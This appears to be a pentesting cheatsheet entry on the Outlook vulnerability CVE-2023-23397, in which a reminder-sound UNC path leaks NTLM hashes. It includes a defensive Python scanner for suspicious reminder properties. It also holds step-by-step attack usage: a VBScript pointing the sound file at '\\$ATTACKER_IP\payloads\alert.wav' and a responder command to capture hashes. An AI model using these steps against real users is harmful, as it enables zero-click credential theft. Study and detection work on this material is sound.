# Outlook Exploits
## CVE-2023-23397
Create an appointment with a custom, malicious reminder sound. The sound file is referenced by a __Universal Naming Convention (UNC)__ path, so Outlook downloads it from a server controlled by the attacker. The goal is to obtain the target's NTLM(v2) hashes. No interaction by the target is required.
Therefore, __PidLidReminderFileParameter__ has to be altered to contain the UNC path, for example `\\$ATTACKER_IP:$ATTACKER_PORT\payload.wav`. The file may be served over __SMB__ or __WebDAV__.
Further, __PidLidReminderOverride__ has to be set to __true__.
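The two properties above are also what a defender audits for. The following added example (not code from this repository or from the PoC it links) checks exported appointment properties, given as plain dicts with the two MAPI names as keys, for a reminder sound that resolves to a UNC path on a host outside a trusted allow-list. The dict layout, the `trusted_hosts` parameter and the sample items, which use the documentation-only address 203.0.113.7, are all constructed here as assumptions.

```python
import re
from dataclasses import dataclass
from typing import Optional

# A UNC reference as Outlook would resolve it: \\host\share\file for SMB, or
# \\host@port\share\file for WebDAV. Group 1 is the host, group 2 the optional port.
UNC_RE = re.compile(r"^\\\\([^\\@/]+)(?:@(\d+))?(?:\\|$)")


@dataclass
class Finding:
    item_id: str
    host: str
    port: Optional[int]
    sound_file: str
    reason: str


def parse_unc(value: str):
    """Return (host, port) if value is a UNC path, otherwise None."""
    m = UNC_RE.match(value.strip())
    if not m:
        return None
    port = int(m.group(2)) if m.group(2) else None
    return m.group(1).lower(), port


def check_reminder(item: dict, trusted_hosts=frozenset()) -> Optional[Finding]:
    """Flag an appointment whose reminder sound would be fetched from an untrusted host."""
    props = item.get("properties", {})
    sound = props.get("PidLidReminderFileParameter")
    if not isinstance(sound, str):
        return None  # no custom sound path present
    parsed = parse_unc(sound)
    if parsed is None:
        return None  # a local path (e.g. C:\Windows\Media\...) triggers no network authentication
    host, port = parsed
    if host in trusted_hosts:
        return None
    # Per the vulnerability description, the override flag is what makes Outlook honour
    # the custom path; report both cases but say which one is live.
    override = bool(props.get("PidLidReminderOverride", False))
    reason = ("override set: Outlook will fetch the file and authenticate to the host"
              if override else "override not set: UNC present but currently inactive")
    return Finding(item["id"], host, port, sound, reason)


def scan(items, trusted_hosts=frozenset()):
    """Run check_reminder over a list of exported items and return the findings."""
    findings = []
    for item in items:
        f = check_reminder(item, trusted_hosts)
        if f is not None:
            findings.append(f)
    return findings


# Constructed sample export (assumed layout, not real mailbox data).
SAMPLE_ITEMS = [
    {"id": "appt-1", "properties": {}},  # default reminder, nothing custom
    {"id": "appt-2", "properties": {"PidLidReminderOverride": True,
                                    "PidLidReminderFileParameter": r"C:\Windows\Media\chimes.wav"}},
    {"id": "appt-3", "properties": {"PidLidReminderOverride": True,
                                    "PidLidReminderFileParameter": r"\\203.0.113.7\payloads\alert.wav"}},
    {"id": "appt-4", "properties": {"PidLidReminderOverride": True,
                                    "PidLidReminderFileParameter": r"\\203.0.113.7@80\share\alert.wav"}},
    {"id": "appt-5", "properties": {"PidLidReminderOverride": True,
                                    "PidLidReminderFileParameter": r"\\fileserver.corp.example\media\ding.wav"}},
]
TRUSTED_HOSTS = frozenset({"fileserver.corp.example"})

if __name__ == "__main__":
    for f in scan(SAMPLE_ITEMS, TRUSTED_HOSTS):
        print(f"{f.item_id}: {f.host} port={f.port} ({f.reason}) <- {f.sound_file}")
```

Only appt-3 and appt-4 are reported: the local path in appt-2 never leaves the machine, and the internal file server in appt-5 is on the allow-list. The same logic, applied across a whole mailbox store, is what Microsoft's own audit script for this vulnerability performs, and the `@port` form is the one to watch for when SMB egress is already blocked but WebDAV is not.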
### Usage
`New Appointment` --> set `Reminder` to 0 minutes.
The `Outlook Spy` plugin is needed. Go to the `OutlookSpy` tab, press `CurrentItem` and go to `Script`.
Set the following variables:
```vbscript
AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = "\\$ATTACKER_IP\payloads\alert.wav"
```
* Set up `responder -I <interface>` to catch the NTLM hash.
Press `Run` to save the variables. Send the appointment afterwards.
### Resources
* [api0cradle's Powershell POC](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell.git)